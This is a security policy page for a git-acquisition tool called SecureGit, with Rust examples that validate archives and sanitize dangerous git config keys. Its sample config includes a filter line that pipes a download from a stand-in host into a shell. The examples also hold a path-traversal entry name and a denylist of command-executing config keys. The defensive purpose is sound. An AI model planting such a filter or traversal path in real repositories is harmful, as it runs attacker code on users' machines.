# Security Policy
## Reporting a Vulnerability
If you discover a security vulnerability in SecureGit, please report it to:
**Email:** security@armyknifelabs.com
Please include:
- Description of the vulnerability
- Steps to reproduce
- Potential impact
- Suggested fix (if any)
We will respond within 48 hours and work with you to address the issue.
## Security Guarantees
SecureGit provides the following security guarantees:
### Code Acquisition
1. **No automatic code execution** - Git hooks, clean/smudge filters, and commands configured through git config are never run during acquisition
2. **Sanitized git directories** - Hooks and config keys that could execute commands are removed from acquired `.git` directories before the repository is used
3. **Validated archives** - Archives are checked for zip bombs, path-traversal entry names, and oversized contents before extraction
4. **Integrity verification** - ZIP contents are verified to match the git history
5. **Comprehensive scanning** - Multiple security plugins analyze all acquired code
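As an added illustration of what the archive validation step has to check (example code written for this page, not SecureGit's own implementation), the Rust validator below rejects an archive on a path-traversal or absolute entry name, an oversized entry, an oversized total, or a suspicious compression ratio, all from the entry metadata and before anything is extracted. The `Entry`, `Limits` and `Violation` types, the limit values, and the sample archives are assumptions constructed for the example; a real validator reads the metadata from the archive's central directory.

```rust
// Added example, not SecureGit's code: the checks an archive validator
// applies to untrusted ZIP metadata before extraction. Entry metadata and
// limit values here are constructed for illustration.

/// Metadata for one archive entry, as read from the central directory.
#[derive(Debug)]
pub struct Entry {
    pub name: String,
    pub compressed: u64,
    pub uncompressed: u64,
}

/// Limits for the archive as a whole and per entry (illustrative values).
#[derive(Debug)]
pub struct Limits {
    pub max_entries: usize,
    pub max_entry_bytes: u64,
    pub max_total_bytes: u64,
    /// Highest uncompressed:compressed ratio accepted for an entry at least
    /// `ratio_min_bytes` large (tiny files legitimately compress very well).
    pub max_ratio: u64,
    pub ratio_min_bytes: u64,
}

#[derive(Debug, PartialEq, Eq)]
pub enum Violation {
    TooManyEntries(usize),
    AbsolutePath(String),
    PathTraversal(String),
    EntryTooLarge(String, u64),
    TotalTooLarge(u64),
    SuspiciousRatio(String, u64),
}

/// Reject entry names that could escape the extraction directory. Both
/// separators are checked because some archivers write backslashes.
fn check_path(name: &str) -> Result<(), Violation> {
    let b = name.as_bytes();
    let drive_prefix = b.len() >= 2 && b[1] == b':' && b[0].is_ascii_alphabetic();
    if name.starts_with('/') || name.starts_with('\\') || drive_prefix {
        return Err(Violation::AbsolutePath(name.to_string()));
    }
    if name.split(|c| c == '/' || c == '\\').any(|seg| seg == "..") {
        return Err(Violation::PathTraversal(name.to_string()));
    }
    Ok(())
}

/// Validate the whole archive, returning the first violation found.
pub fn validate(entries: &[Entry], limits: &Limits) -> Result<(), Violation> {
    if entries.len() > limits.max_entries {
        return Err(Violation::TooManyEntries(entries.len()));
    }
    let mut total: u64 = 0;
    for e in entries {
        check_path(&e.name)?;
        if e.uncompressed > limits.max_entry_bytes {
            return Err(Violation::EntryTooLarge(e.name.clone(), e.uncompressed));
        }
        // Sizes are attacker-controlled: a plain `+=` could wrap around.
        total = total
            .checked_add(e.uncompressed)
            .ok_or(Violation::TotalTooLarge(u64::MAX))?;
        if total > limits.max_total_bytes {
            return Err(Violation::TotalTooLarge(total));
        }
        if e.uncompressed >= limits.ratio_min_bytes {
            let ratio = e.uncompressed / e.compressed.max(1);
            if ratio > limits.max_ratio {
                return Err(Violation::SuspiciousRatio(e.name.clone(), ratio));
            }
        }
    }
    Ok(())
}

pub fn default_limits() -> Limits {
    Limits {
        max_entries: 10_000,
        max_entry_bytes: 100 << 20, // 100 MiB per entry
        max_total_bytes: 1 << 30,   // 1 GiB in total
        max_ratio: 100,
        ratio_min_bytes: 1 << 20,   // ratio check only for entries >= 1 MiB
    }
}

fn entry(name: &str, compressed: u64, uncompressed: u64) -> Entry {
    Entry { name: name.to_string(), compressed, uncompressed }
}

// Constructed sample archives (metadata only).
pub fn sample_clean() -> Vec<Entry> {
    vec![entry("src/main.rs", 1_200, 4_000), entry("Cargo.toml", 300, 500)]
}
pub fn sample_traversal() -> Vec<Entry> {
    vec![entry("src/main.rs", 1_200, 4_000), entry("..\\..\\.bashrc", 50, 80)]
}
pub fn sample_bomb() -> Vec<Entry> {
    vec![entry("data.bin", 1 << 10, 50 << 20)] // 1 KiB claiming to inflate to 50 MiB
}
pub fn sample_too_large() -> Vec<Entry> {
    (0..12).map(|i| entry(&format!("part{}.bin", i), 45 << 20, 90 << 20)).collect()
}

fn main() {
    let limits = default_limits();
    for (label, archive) in [
        ("clean", sample_clean()),
        ("traversal", sample_traversal()),
        ("bomb", sample_bomb()),
        ("too large", sample_too_large()),
    ] {
        println!("{}: {:?}", label, validate(&archive, &limits));
    }
}
```

The ratio check is gated on a minimum entry size so that small, highly compressible files do not trip it. Nested archives (an archive inside an archive) need the same checks applied recursively with a depth limit, which this example does not do.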
### Outbound Protection
1. **Pre-commit scanning** - Secrets and malware caught before commit
2. **Pre-push scanning** - Final check before code reaches remote
3. **Configurable thresholds** - Choose which findings block a commit or push
## Threat Model
### In Scope
- Malicious git hooks
- Dangerous git config keys (such as `core.hooksPath`, `core.fsmonitor`, or `filter.<name>.smudge`, which make git run a command)
- Archive-based attacks (zip bombs, path traversal)
- Embedded malware and backdoors
- Exposed credentials in code
- Supply chain attacks via dependencies
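To make the "Dangerous git config keys" item above and the "Sanitized git directories" guarantee concrete, here is an added example (not SecureGit's code) that parses a `.git/config` shipped inside an archive, flags keys whose values git executes as commands, and returns the config with those assignments removed. The `DANGEROUS` denylist is an illustrative subset of such keys, `sanitize_config` and `Finding` are names chosen for the example, and the sample config is constructed. Hook scripts under `.git/hooks` have to be removed separately; this example covers configuration only.

```rust
// Added example, not SecureGit's own code: find and strip git config keys
// that make git run an external command, for a .git/config that arrived
// inside an archive. The denylist is an illustrative subset, not the
// project's list; hooks under .git/hooks must be handled separately.

/// (section, variable, needs a subsection) for keys whose value git executes.
/// Section and variable names are lowercase because git treats them
/// case-insensitively; subsection names (e.g. the filter name) are not.
const DANGEROUS: &[(&str, &str, bool)] = &[
    ("core", "hookspath", false),  // redirect hooks to attacker files
    ("core", "fsmonitor", false),  // runs on every `git status`
    ("core", "sshcommand", false),
    ("core", "gitproxy", false),
    ("core", "askpass", false),
    ("core", "pager", false),
    ("core", "editor", false),
    ("filter", "clean", true),     // clean/smudge run on add/checkout
    ("filter", "smudge", true),
    ("filter", "process", true),
    ("diff", "command", true),
    ("diff", "textconv", true),
    ("merge", "driver", true),
    ("credential", "helper", false),
    ("gpg", "program", false),
];

#[derive(Debug, PartialEq, Eq)]
pub struct Finding {
    pub line: usize, // 1-based line in the config
    pub key: String, // canonical dotted name, e.g. filter.lfs.clean
}

/// Parse `[section]` or `[section "subsection"]`.
fn parse_header(line: &str) -> Option<(String, Option<String>)> {
    let inner = line.strip_prefix('[')?.strip_suffix(']')?;
    match inner.split_once(' ') {
        Some((sec, sub)) => Some((
            sec.trim().to_lowercase(),
            Some(sub.trim().trim_matches('"').to_string()),
        )),
        None => Some((inner.trim().to_lowercase(), None)),
    }
}

fn is_dangerous(section: &str, subsection: Option<&str>, name: &str) -> bool {
    DANGEROUS
        .iter()
        .any(|&(s, n, needs_sub)| s == section && n == name && needs_sub == subsection.is_some())
}

fn dotted(section: &str, subsection: Option<&str>, name: &str) -> String {
    match subsection {
        Some(sub) => format!("{}.{}.{}", section, sub, name),
        None => format!("{}.{}", section, name),
    }
}

/// Returns the config text with dangerous assignments removed, plus a
/// record of what was removed.
pub fn sanitize_config(text: &str) -> (String, Vec<Finding>) {
    let mut out = String::new();
    let mut findings = Vec::new();
    let mut section = String::new();
    let mut subsection: Option<String> = None;
    for (idx, raw) in text.lines().enumerate() {
        let line = raw.trim();
        if line.starts_with('#') || line.starts_with(';') {
            // comment line: kept unchanged
        } else if let Some((sec, sub)) = parse_header(line) {
            section = sec;
            subsection = sub;
        } else if let Some((name, _value)) = line.split_once('=') {
            let name = name.trim().to_lowercase();
            if is_dangerous(&section, subsection.as_deref(), &name) {
                findings.push(Finding {
                    line: idx + 1,
                    key: dotted(&section, subsection.as_deref(), &name),
                });
                continue; // drop the assignment from the sanitized output
            }
        }
        out.push_str(raw);
        out.push('\n');
    }
    (out, findings)
}

/// Constructed sample .git/config as it might ship inside a repository archive.
pub const SAMPLE_CONFIG: &str = "\
[core]
\trepositoryformatversion = 0
\tfilemode = true
\thooksPath = .git/../.hooks
\tfsmonitor = .git/fsmonitor.sh
[remote \"origin\"]
\turl = https://example.invalid/repo.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[filter \"lfs\"]
\tclean = curl -s https://example.invalid/x | sh
\trequired = true
";

fn main() {
    let (clean, findings) = sanitize_config(SAMPLE_CONFIG);
    for f in &findings {
        println!("line {}: removed {}", f.line, f.key);
    }
    print!("{}", clean);
}
```

Two caveats for a real sanitizer: `include.path` and `includeIf.<condition>.path` can pull further config files into effect and should be dropped or resolved as well, and git also reads the per-user and system config, so only the repository-level file is in scope for this check.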
### Out of Scope
- Zero-day vulnerabilities in git itself
- Compromised build infrastructure
- Social engineering attacks
- Runtime vulnerabilities in cloned code
## Security Best Practices
1. Always use `--fail-on` in CI/CD pipelines so that findings fail the job instead of only being reported
2. Review findings before approving an acquisition
3. Use `--no-history` for untrusted sources when the history isn't needed; less untrusted material then has to be sanitized and scanned
4. Scan repositories you already have with `securegit scan --include-git` so that their `.git` directories are checked as well
5. Install the pre-commit and pre-push hooks so that secrets are caught before they are committed or pushed
## Dependencies
We maintain a minimal dependency tree and regularly audit all dependencies using:
- cargo-audit
- Dependabot
- Manual security reviews
## Disclosure Policy
We believe in responsible disclosure and will:
1. Acknowledge receipt within 48 hours
2. Provide a timeline for fixes
3. Credit researchers (with permission)
4. Publish security advisories for confirmed issues